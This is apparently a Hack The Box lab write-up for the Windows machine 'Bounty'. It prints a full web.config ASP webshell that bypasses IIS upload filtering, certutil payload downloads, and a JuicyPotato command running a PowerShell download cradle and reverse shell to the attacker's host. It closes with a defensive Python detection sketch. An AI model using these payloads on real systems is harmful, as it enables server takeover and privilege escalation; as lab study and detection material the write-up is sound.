#hackthebox #easy #windows

![[Pasted image 20250824234322.png]]

# Information Gathering - Nmap

A TCP scan against all ports revealed only one open port: 80

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -Pn -n --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 01:15 UTC
Nmap scan report for 10.10.10.93
Host is up (0.049s latency).
Not shown: 65534 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 43.88 seconds
```

Run another TCP scan against port 80 to gather more information

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap $IP -sCV -p 80
Starting Nmap 7.95 ( https://nmap.org ) at 2025-08-25 01:18 UTC
Nmap scan report for 10.10.10.93
Host is up (0.047s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.17 seconds
```

Lastly, a UDP scan against the top 10 ports.

---

# Enumeration

##### HTTP - TCP 80

The landing page on port 80 just has an image of an old wizard(?) at the center.
![[Pasted image 20250824201953.png]]

There's no more information other than the image. I ran `feroxbuster` to enumerate files/directories.

![[Pasted image 20250824203511.png]]

Unfortunately, both `/aspnet_client` and `/uploadedfiles` return the status code `403`, meaning we have no authorization to access those pages. Since I know the website is powered by `ASP.NET` and the directory `aspnet_client` exists, I am going to run `gobuster` and enumerate for files with `asp` or `aspx` extensions.

![[Pasted image 20250824205359.png]]

`gobuster` discovered `/transfer.aspx`

```bash
┌──(kali㉿kali)-[~/Desktop]
└─$ gobuster dir -u http://$IP -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x asp,aspx
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.93
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              asp,aspx
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/transfer.aspx        (Status: 200) [Size: 941]
```

Navigating to `transfer.aspx`, it simply has a file upload feature.

![[Pasted image 20250824205633.png]]

I uploaded a random image file that I had on my Desktop as a test and it was successfully uploaded.
![[Pasted image 20250824205829.png]]

The uploaded image is available in `uploadedfiles`, the directory we had enumerated using `feroxbuster`.

![[Pasted image 20250824210610.png]]

I tried uploading an `aspx` webshell but it failed.

![[Pasted image 20250824211104.png]]

![[Pasted image 20250824211412.png]]

However, it still returned an error when I navigated to `/uploadedfiles/cmdasp.aspx`, even though the server returned `File uploaded successfully`.

![[Pasted image 20250824211506.png]]

I was stuck here for a while, so I referred to `0xdf`'s writeup. I noticed my error message above is quite different from his. His error message mentions `web.config`, and it suggests modifying the `web.config` file. The `web.config` file holds settings and configuration data for web applications on `IIS` servers, similar to `.htaccess` on an Apache server. Anyway, you can upload `.config` files and use them to execute code: a `web.config` placed in a directory applies to that directory, and the one below maps `*.config` to the classic ASP handler and lifts the request-filtering rules that would otherwise block the `.config` extension and the `web.config` hidden segment, so the ASP appended after the XML runs when the file is requested. One way to do it is appending the code at the end of the file. This is the payload I'm going to use:

```xml
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!--
<% Response.write("-"&"->")%>
<%
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")

Function getCommandOutput(theCommand)
    Dim objShell, objCmdExec
    Set objShell = CreateObject("WScript.Shell")
    Set objCmdExec = objshell.exec(thecommand)
    getCommandOutput = objCmdExec.StdOut.ReadAll
end Function
%>

<BODY>
<FORM action="" method="GET">
<input type="text" name="cmd" size=45 value="<%= szCMD %>">
<input type="submit" value="Run">
</FORM>
<PRE>
<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
<%Response.Write(Request.ServerVariables("server_name"))%>
<p>
<b>The server's port:</b>
<%Response.Write(Request.ServerVariables("server_port"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("server_software"))%>
</p>
<p>
<b>The server's software:</b>
<%Response.Write(Request.ServerVariables("LOCAL_ADDR"))%>
<%
szCMD = request("cmd")
thisDir = getCommandOutput("cmd /c" & szCMD)
Response.Write(thisDir)
%>
</p>
<br>
</BODY>
<%Response.write("<!-"&"-") %>
-->
```

I uploaded the `web.config` file and navigated to `/uploadedfiles/web.config`. This finally displayed a webshell!

![[Pasted image 20250824213433.png]]

However, the webshell only lasts for a minute or two. It looks like the files under the `uploadedfiles` directory are being cleared out every few minutes.

![[Pasted image 20250824213523.png]]

# Initial Access - shell as `merlin`

So I'm going to use `nishang` to get a reverse shell instead. I opened up `web.config` and replaced our aspx webshell payload with the following.

![[Pasted image 20250824215159.png]]

I downloaded `Invoke-PowerShellTcp.ps1` from the `nishang` GitHub repo, then added a line at the very bottom to invoke a callback.

![[Pasted image 20250824215647.png]]

After `web.config` is uploaded, I visit `/uploadedfiles/web.config` to trigger the file. It will then grab `Invoke-PowerShellTcp.ps1` from my HTTP server that's running on port 80. Finally, it will invoke the callback and connect to my reverse shell listener running on port 1234.

![[Pasted image 20250824215857.png]]

![[Pasted image 20250824220247.png]]

Got a shell as `merlin`

```powershell
┌──(kali㉿kali)-[~/Desktop]
└─$ rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.10.93] 49158
Windows PowerShell running as user BOUNTY$ on BOUNTY
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>whoami
bounty\merlin
PS C:\windows\system32\inetsrv>
```

Found hidden `user.txt` in `C:\Users\merlin\Desktop`

```powershell
PS C:\Users\merlin\Desktop> ls -Force

    Directory: C:\Users\merlin\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a-hs         5/30/2018  12:22 AM        282 desktop.ini
-arh-         8/25/2025   4:14 AM         34 user.txt

PS C:\Users\merlin\Desktop> type user.txt
5e84b37a8d1ec102e2bba301351dbd4e
```

# Privilege Escalation - shell as `SYSTEM`

I was going to use `PowerUp.ps1` to search for privilege escalation vectors. However, I was not able to execute it.

```powershell
PS C:\Users\merlin\Desktop> certutil -urlcache -split -f http://10.10.14.9:8888/PowerUp.ps1 PowerUp.ps1
****  Online  ****
  000000  ...
  092a04
CertUtil: -URLCache command completed successfully.
PS C:\Users\merlin\Desktop> ls

    Directory: C:\Users\merlin\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-a---         8/25/2025   6:12 AM     600580 PowerUp.ps1
```

Therefore, I started enumerating vectors manually. The `whoami /priv` command reveals our user `merlin` has `SeImpersonatePrivilege` enabled.
```powershell
PS C:\Users\merlin\Desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
```

I transferred `GodPotato.exe` from my Kali to the target machine

```powershell
PS C:\users\merlin\appdata\local\temp> certutil -urlcache -split -f http://10.10.14.9/GodPotato-NET2.exe GodPotato.exe
****  Online  ****
  0000  ...
  e000
CertUtil: -URLCache command completed successfully.
```

However, it returns `No combase module found`. I think `GodPotato.exe` and this target host are not compatible.

```powershell
PS C:\users\merlin\appdata\local\temp> .\GodPotato.exe -cmd "cmd /c whoami"
[!] No combase module found
```

##### JuicyPotato

Therefore, I switched to `JuicyPotato`.

```powershell
PS C:\users\merlin\appdata\local\temp> certutil -urlcache -split -f http://10.10.14.9/JuicyPotato.exe juicypotato.exe
****  Online  ****
  000000  ...
  054e00
CertUtil: -URLCache command completed successfully.
```

My original plan was to create a new user `wook`, add the user to the local admin group, and log in to the target host as that user via either `evil-winrm` or `psexec`. However, no matter how many times I tried, it didn't work for me!!!

```powershell
PS C:\users\merlin\appdata\local\temp> .\juicypotato.exe -l 1337 -p "cmd.exe" -a "/c net user wook WookPass123! /add" -t * -c '{4991d34b-80a1-4291-83b6-3328366b9097}'
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```

```powershell
PS C:\users\merlin\appdata\local\temp> .\juicypotato.exe -l 1337 -p "cmd.exe" -a "/c net localgroup administrators wook /add" -t * -c '{4991d34b-80a1-4291-83b6-3328366b9097}'
Testing {4991d34b-80a1-4291-83b6-3328366b9097} 1337
....
[+] authresult 0
{4991d34b-80a1-4291-83b6-3328366b9097};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK
```

Then I changed my plan again. Instead of creating a new user, I'm making a reverse shell connection to my Kali as `SYSTEM`. Finally, I got a shell as `SYSTEM`. The command that worked:

```powershell
.\juicypotato.exe -l 1337 -p "cmd.exe" -a "/c powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.9/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.9 -Port 4444" -t * -c '{4991d34b-80a1-4291-83b6-3328366b9097}'
```

![[Pasted image 20250824234054.png]]

Found `root.txt` in `C:\Users\Administrator\Desktop`

```powershell
PS C:\Users\Administrator\Desktop> dir

    Directory: C:\Users\Administrator\Desktop

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
-ar--         8/25/2025   4:14 AM         34 root.txt

PS C:\Users\Administrator\Desktop> type root.txt
0e7...
```
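Both stages of this chain leave a distinctive process lineage on the host: the `web.config` webshell puts `cmd.exe`/`powershell.exe` underneath the IIS worker `w3wp.exe`, and the `SeImpersonatePrivilege` abuse via JuicyPotato's `CreateProcessWithTokenW` yields a SYSTEM child whose parent ran as the low-privileged web user. The following detection sketch is an added example, not part of the writeup or of any tool it uses; it walks a constructed set of Sysmon Event ID 1-style records, and the PIDs, paths and `BOUNTY\merlin` identity are assumptions for illustration.

```python
"""Added example (not from the writeup): process-lineage heuristics for the
two stages above. Records are constructed in the shape of Sysmon Event ID 1
fields; PIDs, paths and the BOUNTY\\merlin identity are illustrative."""
from collections import namedtuple

WEB_WORKERS = {"w3wp.exe"}              # IIS worker process hosting the app
SHELLS = {"cmd.exe", "powershell.exe"}
SERVICE_ACCOUNTS = {"nt authority\\system", "nt authority\\local service",
                    "nt authority\\network service"}
# Sysmon-style fields: Image/User for the child, ParentUser for its parent
ProcEvent = namedtuple("ProcEvent", "pid ppid image user parent_user")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def ancestors(ev, by_pid):
    """Follow ppid links upward; stop at the root or on a loop (PID reuse)."""
    seen, cur = set(), by_pid.get(ev.ppid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        yield cur
        cur = by_pid.get(cur.ppid)

def find_webshell_children(events):
    """Shells with the IIS worker anywhere above them: the web.config stage."""
    by_pid = {e.pid: e for e in events}
    return [e for e in events if basename(e.image) in SHELLS
            and any(basename(a.image) in WEB_WORKERS for a in ancestors(e, by_pid))]

def find_token_jumps(events):
    """SYSTEM child of a non-service parent: what CreateProcessWithTokenW leaves behind."""
    return [e for e in events if e.user.lower() == "nt authority\\system"
            and e.parent_user.lower() not in SERVICE_ACCOUNTS]

S, M = "NT AUTHORITY\\SYSTEM", "BOUNTY\\merlin"
SAMPLE = [  # constructed chain mirroring the writeup, plus one benign SYSTEM child
    ProcEvent(1000, 4, r"C:\Windows\System32\svchost.exe", S, S),
    ProcEvent(2000, 1000, r"C:\Windows\System32\inetsrv\w3wp.exe", M, S),
    ProcEvent(2100, 2000, r"C:\Windows\System32\cmd.exe", M, M),
    ProcEvent(2200, 2100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", M, M),
    ProcEvent(2300, 2200, r"C:\Users\merlin\AppData\Local\Temp\juicypotato.exe", M, M),
    ProcEvent(2400, 2300, r"C:\Windows\System32\cmd.exe", S, M),
    ProcEvent(3000, 1000, r"C:\Windows\System32\cmd.exe", S, S),  # e.g. a scheduled task
]

if __name__ == "__main__":
    for e in find_webshell_children(SAMPLE):
        print(f"[webshell] pid {e.pid} {basename(e.image)} descends from w3wp.exe, user {e.user}")
    for e in find_token_jumps(SAMPLE):
        print(f"[token]    pid {e.pid} runs as {e.user}, parent ran as {e.parent_user}")
```

The second heuristic is deliberately narrow: elevation through UAC or PsExec spawns the SYSTEM child from a service-account parent, so only a SYSTEM child of an ordinary-user parent is flagged.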